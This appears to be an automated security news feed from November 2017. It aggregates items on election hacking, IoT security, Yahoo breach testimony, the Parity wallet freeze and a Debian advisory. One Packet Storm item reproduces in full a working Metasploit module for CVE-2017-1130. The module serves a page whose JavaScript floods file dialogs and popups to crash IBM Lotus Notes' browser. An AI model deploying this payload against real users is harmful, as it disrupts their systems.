IBM Lotus Notes Denial Of Service

IBM Lotus Notes Denial Of Service

http://ift.tt/2yIN5N5

This Metasploit module creates a malicious web page that causes a crash in IBM Lotus Notes when viewed in the native browser.

Security News

via Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

Debian Security Advisory 4021-1

Debian Security Advisory 4021-1

http://ift.tt/2m2TDjL

Debian Linux Security Advisory 4021-1 – It was discovered that missing input validation in the Open Ticket Request System could result in privilege escalation by an agent with write permissions for statistics.

Security News

via Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

IBM Lotus Notes Denial Of Service

IBM Lotus Notes Denial Of Service

http://ift.tt/2yIN5N5

##
# This module requires Metasploit: http://ift.tt/2tGh41I
# Current source: http://ift.tt/1iQz0Mp
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes Denial Of Service",
'Description' => %q(
This module exploits a vulnerability in the native browser
that comes with IBM Lotus Notes.
If successful, the browser will crash after viewing the webpage.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
['EDB', '42604'],
[ 'CVE', '2017-1130' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end

def run
exploit # start http server
end

def setup
@html = %|
<html><body>
<input type="file" id="f">
<script>
var w;
var kins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
for (var k in kins) {
if (kins[k] && kins[k].status === undefined) {
kins[k].close();
delete kins[k];
}
}
w = open('data:text/html,<input type="file"
id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
if (w) {
kins[i] = w;
i++;
}
}, 1);
</script>
</body></html>
|
end

def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end


# URL: http://ift.tt/2zsae3v

Security News

via Exploit Files ≈ Packet Storm http://ift.tt/1Fpvz7L

November 8, 2017 at 08:33AM

Daten-Button: NRW will Warnhinweise für Apps

Daten-Button: NRW will Warnhinweise für Apps

http://ift.tt/2yiv9EU

Bundesratsinitiative

Daten-Button: NRW will Warnhinweise für Apps

Um die Verbraucher besser vor dem unbemerkten Datenklau durch Smartphone-Apps zu warnen, will Nordrhein-Westfalen laut einem Medienbericht eine Gesetzesänderung anstoßen.

Security News

via com! professional http://ift.tt/2wN2Hwm

November 8, 2017 at 08:32AM

Have Hackers Undermined Our Faith In Democracy?

Have Hackers Undermined Our Faith In Democracy?

http://ift.tt/2zrBkK0

What a difference a year makes. This time last year, Twitter pooh-poohed any suggestion that Russian agents ran accounts on its platform for purposes of subverting the US election.

A month ago, it was forced to eat its words, owning up to maybe just a few paltry 201. Last week, in the course of a Congressional grilling, that estimate ticked upward a magnitude to more than 2,700.

Facebook, too, upped the ante, admitting that Russian-backed content may have reached not 10 million users, as previously claimed, but 126 million. Some of this, as analysis of the @TEN_GOP Twitter account suggests, was influential. But did it influence the election? That is the $64,000 question. Or, given how much Donald Trump appears to be profiting from his election as US president, perhaps the $64m question.

Not to be outdone, the UK may, finally, be asking some of the same questions. A petition politely asking the UK government to “investigate covert foreign interference in the EU referendum” was cancelled earlier this year when the general election was called. Now it is back and has hit 10,000 signatures, an official (written) response is required.

100,000 signatures means the petition will be considered for debate in Parliament.

Attempts at targeted influence were not restricted to US and UK votes. The same techniques appear to have been deployed during French and German elections.

Union Jack and suit photo via Shutterstock

UK General Election 2017: How EU law will hit British politicians’ Facebook fight

READ MORE

These latest admissions add massively to previous concerns that, whatever covert interference took place, financiers with deep pockets were hard at work influencing the outcomes of national elections using advanced data mining techniques and targeted online messaging.

None of the above are great for democracy. All suggest that the influence of social media has already proven malign. Yet this focus on the indirect threat, from tactics designed to swing individual voting may be missing a much bigger issue. That is, the threat from partisan campaigners and hackers to subvert the voting process directly, making the outcome of future elections at best dubious, and, whatever the outcome, destroying the legitimacy of those elections.

This summer, The Register revealed how election-rigging has spread to the disaffected of Reddit, who masterminded a campaign to deprive lefty-leaning radio presenter James O’Brien of a Radio Times award. Their tools: batch-voting bots for Windows and JavaScript, supplemented by a Tor-based Linux app, designed to get past the meagre safeguards put in place by poll host PollDaddy.

Politically motivated? It’s hard to tell. Some hackers probably resented the regular spankings that O’Brien administers to pro-Brexit callers on his popular LBC radio show. Others, though, seemed to be doing it “for lulz”.

More serious are reports, about the same time, of trolls attempting to distort the results of the government’s first LGBT survey. According to some news outlets, this was politically motivated: far-right campaigners exploiting an opportunity to derail attempts by the Government Equalities Office to make policy more responsive to LGBT needs, while simultaneously ramping up Islamophobia.

Again, reality is likely mixed: some politics, some lulz. The end result is the same: a lot of work for data analysts weeding out spurious input; and a lingering suspicion that this survey cannot be trusted to deliver accurate insight. Because out there, in the dark spaces of the web, some of the derailers were discussing how they could more plausibly derail. This involved encouraging submissions that weren’t obvious trolls, advocating propositions with little support in the LGBT community but nonetheless credible.

But scale that up, beyond simple online polls to general elections. A year ago, Symantec demonstrated there existed major holes in paperless touchscreen direct-recording electronic (DRE) voting machines used in the US. But it was not until September 2017 that the US state of Virginia agreed to stop (PDF) using these machines after attendees at DefCon’s “Voting Machine Hacking Village” flagged them up as potentially vulnerable to hackers.

election hacking

It took DEF CON hackers minutes to pwn these US voting machines

READ MORE

Explaining the decision, Department of Elections Commissioner Edgardo Cortes wrote: “The Department of Elections believes that the risks presented by using this equipment in the November General Election are sufficiently significant to warrant immediate decertification to ensure the continued integrity of Virginia elections.”

This is just the tip of the iceberg. Verified Voting surveyed systems used in the 2016 Presidential election. They found five states relying solely on DRE machines and a further eight relying on a mix of paper ballots and paperless DRE machines.

Security much?

In September 2017, the Department of Homeland Security finally confirmed that election systems in at least 21 states had been targeted by Russian hackers in the run-up to the 2016 contest. A small number of systems were breached but, the agency concluded, there was no evidence of any actual vote manipulation.

This follows revelations last year of attempts to hack voter registration systems in Arizona and Illinois. Officials were keen to stress that these involved “preparatory activity such as scanning computer systems” and that “attempts to compromise networks” were mostly unsuccessful. Given that the Illinois attack took down the system for 10 days, and some 200,000 voter details may have been compromised, that is a pretty elastic definition of “unsuccessful”.

Still, officials are clear that it is “unlikely” that any real damage was done. So we can all sleep reassured. Mostly.

The problem with digital systems is the overarching fear that everything could be blown up in one act of hacker spite.

This is compounded by the fact that we don’t know what we don’t know. A further issue with the DREs in Virginia and elsewhere is that they produce no paper trail. They have no vote-auditing capability. We are assured that they have never been hacked but if they were, how would we tell?

The real enemy in this is official complacency.

According to security expert Bruce Schneier, it may now be too late to fix the holes in some systems. He wrote: “We must ignore the machine manufacturers’ spurious claims of security, create tiger teams to test the machines – and systems – resistance to attack, drastically increase their cyber-defenses and take them offline if we can’t guarantee their security online.”

Earlier this year hacker collective Chaos Computer Club (CCC) were shocked not only to discover how easily they could hack – and change – preliminary results of the German Election, but by the dismissive attitudes of those tasked with safeguarding the election. They fixed the systems hole with a patch that CCC almost immediately circumvented.

The US State of Georgia has rejected offers of help to safeguard its voting system, claiming this was just scare-mongering and a power grab from the centre.

From social media to civil servants to politicians, the message is the same: nothing to worry about. A year on, we are beginning to understand how modest our fears were and that the worst may yet be to come.

There are two sets of hackers in this world: those targeting the machinery of voting and those seeking to corrupt the debate, the discourse, the atmosphere via social media. Both are united by a desire to compromise the actual voting, but they’ll happily settle for undermining confidence in the overall result. In this, thanks to complacency everywhere, they appear to be achieving their aim. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

IoT Devices Are An Enterprise Security Time Bomb

IoT Devices Are An Enterprise Security Time Bomb

http://ift.tt/2iFrN8s

The Internet of Things (IoT) is causing serious security concerns for enterprises worldwide with few companies capable of securing them as they are unable to identify devices properly, according to new research.

On Wednesday, ForeScout Technologies revealed the results of a new survey into the challenges IoT poses for the enterprise.

The survey, conducted by Forrester Consulting, suggests that IoT and operational technology (OT) are having a serious impact on the way businesses conduct themselves today — and pose a huge risk due to a lack of information and appropriate security practices.

According to the survey, based on responses from 603 IT and line-of-business (LoB) decision-makers involved in enterprise security teams across the US, UK, Germany, France, Australia and New Zealand, a massive 82 percent of companies are not confident about passing audits as they are unable to identify all IoT and OT devices on their networks.

To make matters worse, when asked who is responsible for the security of such devices, respondents did not have a clear answer.

In total, 54 percent of respondents said that IoT is causing serious anxiety due to security worries and the impact on the business should a failure occur, and LoB employees demonstrated more concern than IT staff at 58 percent to 51 percent respectively.

Executive skepticism was cited as a barrier to investment into IoT security solutions, alongside budget constraints. As a result of having little money to spare, 40 percent of respondents said that their companies continue to rely on traditional security approaches — which, in turn, prevent a clear view into what devices are connecting to where, and when.

This is a glaring issue for today’s firms, which need crystal-clear visibility into networks where BYOD and IoT are common. Failing to identify and isolate malicious devices or suspicious network activity places company networks and information at serious risk.

See also: Internet of Things: The Security Challenge

However, according to the survey, 59 percent of respondents said they were willing to tolerate a medium to high-risk level in relation to compliance requirements for IoT security — and yet, 90 percent also expect the volume of IoT devices connecting to corporate networks to rise in the next five years.

The research also says that 48 percent of respondents believe improving awareness and visibility of IoT devices should be a top priority for improving IoT security, and 82 percent expect their IoT and OT security spend to increase over the next few years.

“The survey results demonstrate a dynamic shift in the way organizations are starting to think about security and risk as it relates to IoT,” said Michael DeCesare, president, and CEO at ForeScout. “Each new device that comes online represents another attack vector for enterprises and it only takes one device to compromise an entire network and disrupt business operations, which can impact the bottom line. Securing IoT is not just a cybersecurity issue, it is a business issue and operating at any risk level is too much. Enterprises need full visibility.”

Previous and related coverage

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Marissa Mayer Subpoenaed To Testify Before Senate On Yahoo Breaches

Marissa Mayer Subpoenaed To Testify Before Senate On Yahoo Breaches

http://ift.tt/2zGsr0f

Marissa Mayer, CEO of Yahoo!, attends a session of the World Economic Forum 2013 Annual Meeting on January 25, 2013 at the Swiss resort of Davos.


JOHANNES EISELE/AFP/Getty Images

Former Yahoo CEO Marissa Mayer will testify before a Senate committee on Wednesday regarding the massive data breaches that occurred under her watch. However, she only agreed to do so after the committee compelled her appearance with a subpoena, according to reports.

A spokesperson for the Senate Commerce Committee confirmed to ZDNet that the committee issued a subpoena. However, a representative for Mayer told the Hill that she is appearing before the committee voluntarily. The spokesperson did acknowledge to the Hill that the former CEO initially suggested she was not the best witness to discuss the data breaches, which compromised billions of Yahoo accounts.

Along with Mayer, multiple other former and current executives will testify at Wednesday’s hearing on data breaches, including Karen Zacharia, deputy general counsel and chief privacy officer at Verizon (which acquired Yahoo in June); former Equifax CEO Richard Smith; interim Equifax CEO Paulino do Rego Barros, Jr.; and Entrust Datacard CEO Todd Wilkinson.

In September 2016, Yahoo disclosed the theft of 500 million records, then thought to be the largest theft of records in history. Just a few months later, the company revealed a separate theft of one billion records. Then just last month, the web giant said that effectively all 3 billion Yahoo user accounts had been affected by the 2013 breach. After Verizon’s acquisition of Yahoo was finalized in June, Mayer stepped down from the company.

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Ethereum Wallets Worth $280M Accidentally Frozen By Flaw

Ethereum Wallets Worth $280M Accidentally Frozen By Flaw

http://ift.tt/2Al5Um3

Enlarge /

What’s in your Ethereum wallet? It might not matter right now.

Getty Images

Digital currencies and the wallets that hold them have become an increasingly attractive target for digital pickpockets, resulting in millions of real dollars’ worth of lost currency. A $50 million heist of Ethereum currency last year exploiting weaknesses in the cryptocurrency’s underlying software threatened to break the Bitcoin competitor. But a new security bug in a popular Ethereum wallet platform has caused what amounts to a bank freeze on scores of high-value wallets. Today, Parity Technologies Ltd., the developer of cryptographic “wallets” for the digital currencies Bitcoin and Ethereum, announced that an “accidental” triggering of a bug affecting certain Parity wallets had broken them, making it impossible to transfer Ethereum funds out of them.

Security News

via .:[ packet storm ]:. – http://ift.tt/pG2dUI http://ift.tt/1Fpvz7L

November 8, 2017 at 08:27AM

Vodafone Enters The Multibillion-Dollar IoT Market

Vodafone Enters The Multibillion-Dollar IoT Market

http://ift.tt/2m2W2uW

Vodafone announced news on Tuesday (Nov. 7) of its entrance into the Internet of Things (IoT) consumer market through the launch of “V by Vodafone.”

“V by Vodafone” enables consumers to connect millions of home and leisure electronics products to the company’s dedicated global IoT network, which the telecoms company said in a press release is the largest network of its kind in the world.

“The Internet of Things is already beginning to transform how businesses operate. Over the next decade, the expansion of IoT into consumer markets will bring about an equally dramatic shift in how people manage their daily lives, at home and in their leisure time,” said Vodafone Group Chief Executive Vittorio Colao in the press release. “‘V by Vodafone’ makes it simple to connect a wide range of IoT-enabled devices, helping customers keep everyone and everything that matters to them safe and secure. We look forward to applying our world-leading expertise in IoT to help consumers make the most of the next phase of the global digital revolution.”

Citing market research, Vodafone said that estimates suggest that by 2020 there will be more than 370 million consumer electronics and smart home devices capable of connecting to mobile IoT networks in the countries in which Vodafone operates, up from around 50 million today.

“V by Vodafone” is a system for consumers to connect and manage IoT devices and a product range that includes a connected car dongle, a 4G security camera, a pet location and activity tracker and a bag location tracker. To enable connected devices, Vodafone is rolling out “V-Sim by Vodafone,” which is a Sim card that will be shipped with IoT-enabled consumer electronics products sold by Vodafone. “V-Sim by Vodafone” will be also offered by third-party retailers next year.

There’s also the “V by Vodafone” smartphone app, which provides customers with a single and intuitive overview of all IoT-enabled products registered to their account. Next year, Vodafone said it will also launch a new online product marketplace open to IoT developers that will greatly extend product choice for customers.

Security News,IoT News

via IoT – Google News http://ift.tt/2h68U1y

November 8, 2017 at 08:25AM

Telecoms giant Vodafone makes push into internet of things consumer market

Telecoms giant Vodafone makes push into internet of things consumer market

http://ift.tt/2hPRaEI

Vodafone has launched a new system that it says will allow consumers to connect “millions of home and leisure electronics products” to its dedicated global internet of things network.

In an announcement Tuesday, the business said its “V by Vodafone” system was made up of, among other things, an internet of things sim card and a smartphone app.

The sim card will be sent out with internet of things-enabled products sold by Vodafone, while the app will give customers an overview of all the internet of things-enabled products registered to their account.

Launch products include a location and activity tracker for pets, which allows owners to track their dogs and cats using GPS and the mobile network. Owners will get an alert on their smartphone if their pet moves away from a designated area, and will be able to monitor their animal’s sleeping patterns and movements.

The European Commission describes the internet of things as merging “physical and virtual worlds, creating smart environments.” According to analysis from the McKinsey Global Institute, the potential economic impact of the internet of things in 2025, including consumer surplus, could be anything between $3.9 trillion and $11.1 trillion.

“The internet of things is already beginning to transform how businesses operate,” Vittorio Colao, chief executive of the Vodafone Group, said in a statement Tuesday. “Over the next decade, the expansion of internet of things into consumer markets will bring about an equally dramatic shift in how people manage their daily lives, at home and in their leisure time.”

Follow CNBC International on Twitter and Facebook.

Security News,IoT News

via IoT – Google News http://ift.tt/2h68U1y

November 8, 2017 at 08:25AM